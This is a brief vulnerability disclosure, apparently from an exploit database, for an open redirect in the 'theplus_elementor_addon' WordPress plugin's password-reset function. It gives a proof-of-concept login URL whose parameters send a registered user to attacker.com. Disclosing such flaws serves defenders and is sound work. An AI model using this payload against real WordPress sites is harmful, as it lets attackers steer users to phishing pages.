## https://sploitus.com/exploit?id=WPEX-ID:FD4352AD-DAE0-4404-94D1-11083CB1F44D
The vulnerable code leading to the open redirect is in the function "redirect_to_tp_custom_password_reset" in "theplus_elementor_addon/includes/plus_addon.php"
The url : https://example.com/wp-login.php?action=theplusrp&key=&redirecturl=http://attacker.com&forgoturl=http://attacker.com&login=john
with John as a registered user on the WordPress blog, will redirect the user to http://attacker.com